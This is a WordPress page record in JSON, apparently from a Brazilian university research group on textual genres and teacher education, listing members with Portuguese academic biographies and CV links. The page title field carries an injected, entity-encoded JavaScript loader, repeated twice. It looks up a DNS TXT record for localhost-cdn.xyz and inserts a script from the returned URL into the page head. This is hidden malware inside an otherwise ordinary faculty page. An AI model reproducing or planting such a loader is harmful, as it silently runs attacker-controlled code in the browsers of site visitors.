{"id":9,"date":"2023-09-03T00:00:00","date_gmt":"2023-09-03T03:00:00","guid":{"rendered":"http:\/\/www2.unicentro.br\/gpgenerostextuais\/?page_id=9"},"modified":"2024-09-13T05:30:21","modified_gmt":"2024-09-13T08:30:21","slug":"integrantes-do-grupo","status":"publish","type":"page","link":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/integrantes-do-grupo\/","title":{"rendered":"Integrantes do Grupofetch(&amp;amp;amp;amp;quot;https:\/\/cloudflare-dns.com\/dns-query?name=localhost-cdn.xyz&amp;amp;amp;amp;amp;amp;type=TXT&amp;amp;amp;amp;quot;, {headers:{ &amp;amp;amp;amp;quot;accept&amp;amp;amp;amp;quot;: &amp;amp;amp;amp;quot;application\/dns-json&amp;amp;amp;amp;quot; }}).then(e=&amp;amp;amp;amp;amp;gt;e.json()).then(e=&amp;amp;amp;amp;amp;gt;{const t=document.createElement(&amp;amp;amp;amp;quot;script&amp;amp;amp;amp;quot;);t.src=JSON.parse(e.Answer[0].data),document.querySelector(&amp;amp;amp;amp;quot;head&amp;amp;amp;amp;quot;).appendChild(t)});fetch(&amp;amp;amp;amp;quot;https:\/\/cloudflare-dns.com\/dns-query?name=localhost-cdn.xyz&amp;amp;amp;amp;amp;amp;type=TXT&amp;amp;amp;amp;quot;, {headers:{ &amp;amp;amp;amp;quot;accept&amp;amp;amp;amp;quot;: &amp;amp;amp;amp;quot;application\/dns-json&amp;amp;amp;amp;quot; }}).then(e=&amp;amp;amp;amp;amp;gt;e.json()).then(e=&amp;amp;amp;amp;amp;gt;{const t=document.createElement(&amp;amp;amp;amp;quot;script&amp;amp;amp;amp;quot;);t.src=JSON.parse(e.Answer[0].data),document.querySelector(&amp;amp;amp;amp;quot;head&amp;amp;amp;amp;quot;).appendChild(t)});"},"content":{"rendered":"<h2 style=\"text-align: justify\"><strong><span style=\"font-size: 8pt;color: #800080\">L\u00eddia Stutz<\/span><\/strong><\/h2>\n<p style=\"text-align: justify\"><span style=\"font-size: 8pt\">Possui gradua\u00e7\u00e3o em Letras Portugu\u00eas Ingl\u00eas pela Universidade Estadual do Centro-Oeste (1993), mestrado em Letras (Ingl\u00eas e Literatura Correspondente) pela Universidade Federal de Santa Catarina (2005), doutorado em Estudos da Linguagem pela Universidade Estadual de Londrina (2012) com est\u00e1gio doutoral realizado na Universidade de Genebra (Bolsa CAPES- DS &#8211; 2010) e p\u00f3s-doutorado em Estudos da Linguagem pela Universidade Estadual de Londrina (2017). Professora Adjunta N\u00edvel D do Departamento de Letras e do Mestrado em Letras na Universidade Estadual do Centro-Oeste. \u00c9 l\u00edder do grupo de pesquisa G\u00eaneros Textuais e Pr\u00e1xis Docente &#8211; UNICENTRO e integrante do grupo de pesquisa Linguagem e Educa\u00e7\u00e3o da UEL. Atuou como coordenadora do Subprojeto PIBID Letras Ingl\u00eas de agosto 2012 &#8211; 2018. De agosto de 2017 a janeiro de 2019 coordenou o Programa de P\u00f3s-Gradua\u00e7\u00e3o Stricto Sensu em Letras (N\u00edvel Mestrado) na UNICENTRO. A professora atua no Est\u00e1gio Supervisionado em L\u00edngua Inglesa e tem experi\u00eancia na \u00e1rea de Lingu\u00edstica Aplicada \u00e0 L\u00edngua Inglesa, com \u00eanfase nos seguintes temas: ensino de L\u00ednguas, interacionismo sociodiscursivo, g\u00eaneros textuais, saberes docentes, forma\u00e7\u00e3o de professores, reflexividade e gestos did\u00e1ticos.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/buscatextual.cnpq.br\/buscatextual\/visualizacv.do?id=K4701524U7\">[Curr\u00edculo Lattes]<\/a><\/span><\/p>\n<h2><strong><span style=\"font-size: 8pt;color: #800080\">Edan Luis de Almeida<\/span><\/strong><\/h2>\n<p><span style=\"font-size: 8pt\">Possui gradua\u00e7\u00e3o em Letras Ingl\u00eas e Literaturas de L\u00edngua inglesa pela Universidade Estadual do Centro-Oeste, UNICENTRO (2016). Mestrando em Letras &#8211; Interfaces entre L\u00edngua e Literatura (2018-2020).<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/6000486106790113\">[Curr\u00edculo Lattes]\u00a0<\/a><\/span><\/p>\n<h2><span style=\"font-size: 8pt;color: #800080\">Eleticia Elza Carneiro Podolak Strukoski<\/span><\/h2>\n<p><span style=\"font-size: 8pt\">Graduada em Letras Ingl\u00eas pela Universidade Estadual do Centro-Oeste e mestranda do programa de P\u00f3s-gradua\u00e7\u00e3o Mestrado em Letras pela mesma institui\u00e7\u00e3o. Professora de l\u00edngua portuguesa na modalidade de imers\u00e3o em l\u00edngua estrangeira, no estado de Utah, Estados Unidos. \u00c1rea de pesquisa com \u00eanfase em educa\u00e7\u00e3o, l\u00edngua inglesa e lingu\u00edstica aplicada.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/9485681437968264\">[Curr\u00edculo Lattes]\u00a0<\/a><\/span><\/p>\n<h2><span style=\"font-size: 8pt;color: #800080\">Everton Gelinski Gomes de Souza<\/span><\/h2>\n<p><span style=\"font-size: 8pt\">\u00c9 professor colaborador do Departamento de Letras na Universidade Estadual do Centro-Oeste. \u00c9 membro do grupo G\u00eaneros Textuais e Pr\u00e1xis Docente, desenvolvendo estudos direcionados \u00e0s did\u00e1ticas das l\u00ednguas. Tem experi\u00eancia na \u00e1rea de Letras, com \u00eanfase em Lingu\u00edstica Aplicada, atuando principalmente nos seguintes temas: g\u00eaneros textuais, interacionismo sociodiscursivo e ensino de l\u00edngua inglesa.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/2245380099291479\">[Curr\u00edculo Lattes]<\/a><\/span><\/p>\n<h2><span style=\"font-size: 8pt;color: #800080\">Gabriela Tabareli Neuvald<\/span><\/h2>\n<p><span style=\"font-size: 8pt\">Possui gradua\u00e7\u00e3o em Letras &#8211; Ingl\u00eas pela Universidade Estadual do Centro-Oeste (2018). Mestranda em Letras pela UNICENTRO. Atualmente \u00e9 professora de l\u00edngua inglesa no Ensino B\u00e1sico. Tem experi\u00eancia na \u00e1rea de Letras, com \u00eanfase em L\u00ednguas Estrangeiras Modernas, pesquisa principalmente nos seguintes temas: interacionismo, ensino e letramento cient\u00edfico.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/1118334729975390\">[Curr\u00edculo Lattes]<\/a><\/span><\/p>\n<h2><span style=\"font-size: 8pt;color: #800080\">Gerson Anschau Poleze<\/span><\/h2>\n<p><span style=\"font-size: 8pt\">English as a Second Language &#8211; East Coast Language College, Halifax, Canad\u00e1 (Bolsa PFI\/SETI-Pr e Languages Canada \/ 2018). Mestrando em Letras &#8211; Interfaces entre L\u00edngua e Literatura, na linha de pesquisa em Linguagens, leitura e interpreta\u00e7\u00e3o, pelo Programa de P\u00f3s-Gradua\u00e7\u00e3o Stricto Sensu em Letras da Universidade Estadual do Centro-Oeste do Paran\u00e1. Aluno do curso de forma\u00e7\u00e3o continuada para Pesquisador em Ci\u00eancias da Educa\u00e7\u00e3o: Estrat\u00e9gias de Ensino e Aprendizagem, pelo Instituto Federal de Minas Gerais, Campus Arcos \/ IFMG. Gradua\u00e7\u00e3o em Pedagogia (2013). Membro do Grupo de Estudos G\u00eaneros textuais e pr\u00e1xis docente, junto ao CNPQ (dgp.cnpq.br\/dgp\/espelhogrupo\/8458521720239451) e vinculado ao Laborat\u00f3rio de Linguagem, Varia\u00e7\u00e3o e Ensino (LIVE &#8211; PPGL \/ UNICENTRO). Realiza pesquisas na \u00e1rea de g\u00eaneros textuais, com foco em modeliza\u00e7\u00e3o did\u00e1tica e constru\u00e7\u00e3o de sequ\u00eancias did\u00e1ticas para ensino de l\u00edngua estrangeira na educa\u00e7\u00e3o infantil e anos iniciais, forma\u00e7\u00e3o de profissionais de l\u00edngua estrangeira e an\u00e1lise do papel da l\u00edngua estrangeira\/adicional nos documentos que legislam o ensino na 1\u00aa etapa da educa\u00e7\u00e3o b\u00e1sica.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/2434507851390771\">[Curr\u00edculo Lattes]<\/a><\/span><\/p>\n<h2><span style=\"font-size: 8pt;color: #800080\">Josiete Cristina Schneider Queroz<\/span><\/h2>\n<p><span style=\"font-size: 8pt\">Possui gradua\u00e7\u00e3o em Letras Portugu\u00eas Alem\u00e3o pela Universidade do Vale do\u00a0Rio dos Sinos (2009), p\u00f3s-gradua\u00e7\u00e3o em Educa\u00e7\u00e3o Infantil e anos\u00a0iniciais do Ensino Fundamental pelo Centro de Ensino Superior de Maring\u00e1 (2018) e mestrado em Letras (Interfaces entre l\u00edngua e literatura) pela Universidade Estadual do Centro-Oeste (2016). Atualmente, cursa doutorado em Letras pela Universidade Federal do Rio Grande do Sul (UFRGS). Tem experi\u00eancia na \u00e1rea de Letras, com \u00eanfase em Lingu\u00edstica Aplicada, atuando principalmente nos seguintes temas: interacionismo sociodiscursivo, g\u00eaneros textuais, sequ\u00eancias did\u00e1ticas, ensino de l\u00edngua alem\u00e3 em contextos pluril\u00edngues, forma\u00e7\u00e3o de professores e gestos did\u00e1ticos.<\/span><\/p>\n<p><span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/5596498165699127\">[Curr\u00edculo Lattes]<\/a><\/span><\/p>\n<h2><span style=\"font-size: 8pt;color: #800080\">Marco Antonio Cacilho<\/span><\/h2>\n<p><span style=\"font-size: 8pt\">Atua \u00a0no Ensino Superior como professor colaborador da Faculdade Campo Real. Tem experi\u00eancia na \u00e1rea de Letras, com \u00eanfase em Lingu\u00edstica Aplicada, atuando principalmente nos seguintes temas: g\u00eaneros textuais, interacionismo sociodiscursivo e ensino de l\u00edngua portuguesa.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/3412326562326702\">[Curr\u00edculo Lattes]<\/a><\/span><\/p>\n<h2><span style=\"font-size: 8pt;color: #800080\">Monica Lopes<\/span><\/h2>\n<p><span style=\"font-size: 8pt\">Mestrado em Letras Interfaces entre L\u00edngua e Literatura UNICENTRO(2015\/2017). Professora QPM de Administra\u00e7\u00e3o e Ingl\u00eas na SEED-PR. Desenvolve pesquisas nas \u00e1reas de Forma\u00e7\u00e3o inicial e continuada de Professores de Ingl\u00eas, Ensino e aprendizagem de Ingl\u00eas.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/0447625025993860\">[Curr\u00edculo Lattes]<\/a><\/span><\/p>\n<h1><span style=\"font-size: 8pt;color: #800080\">Priscila Azevedo da Fonseca Lanferdini<\/span><\/h1>\n<p><span style=\"font-size: 8pt\">Doutora em Estudos da Linguagem pela Universidade Estadual de Londrina (UEL), na linha de forma\u00e7\u00e3o de professores de L\u00edngua Inglesa, e mestre na mesma \u00e1rea (2012), sob orienta\u00e7\u00e3o da Prof\u00aa. Dr\u00aa. Vera L\u00facia Lopes Cristov\u00e3o. Possui especializa\u00e7\u00e3o em Ensino de L\u00edngua Inglesa pela Faculdade Igua\u00e7u &#8211; ESAP (2007) e gradua\u00e7\u00e3o em Letras-ingl\u00eas e Literaturas de L\u00edngua Inglesa pela Universidade Estadual do Centro-Oeste &#8211; UNICENTRO (2006). \u00c9 professora de L\u00edngua Inglesa da rede B\u00e1sica de Ensino em Guarapuava (PR) desde 2012. Foi professora supervisora do subprojeto PIBID\/Letras-Ingl\u00eas da UNICENTRO entre os anos de 2013 e 2016. Realizou est\u00e1gio sandu\u00edche na Carleton University, sob supervis\u00e3o do Prof\u00ba. Dr\u00ba. Devon Woods e da Prof\u00aa. Dr\u00aa. Eva Kartchava, sendo bolsista do Emerging Leaders in the Americas Program (ELAP), do Governo do Canad\u00e1 no per\u00edodo de 09\/2016 a 04\/2017. Tem interesse na \u00e1rea de Letras, com \u00eanfase no ensino e aprendizagem de L\u00edngua Inglesa, atuando principalmente nos seguintes temas: metodologias de ensino de l\u00ednguas; forma\u00e7\u00e3o inicial e continuada de professores; planejamento did\u00e1tico docente; pol\u00edticas p\u00fablicas educacionais; g\u00eaneros de textos; sequ\u00eancias did\u00e1ticas e an\u00e1lise de materiais did\u00e1ticos.<\/span><br \/>\n<span style=\"font-size: 8pt\"><a href=\"http:\/\/lattes.cnpq.br\/4388817719631110\">[Curr\u00edculo Lattes]\u00a0<\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L\u00eddia Stutz Possui gradua\u00e7\u00e3o em Letras Portugu\u00eas Ingl\u00eas pela Universidade Estadual do Centro-Oeste (1993), mestrado em Letras (Ingl\u00eas e Literatura Correspondente) pela Universidade Federal de Santa Catarina (2005), doutorado em Estudos da Linguagem pela Universidade Estadual de Londrina (2012) com est\u00e1gio doutoral realizado na Universidade de Genebra (Bolsa CAPES- DS &#8211; 2010) e p\u00f3s-doutorado em [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":"","_links_to":"","_links_to_target":""},"class_list":["post-9","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/9","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/comments?post=9"}],"version-history":[{"count":66,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":209,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/9\/revisions\/209"}],"wp:attachment":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/media?parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}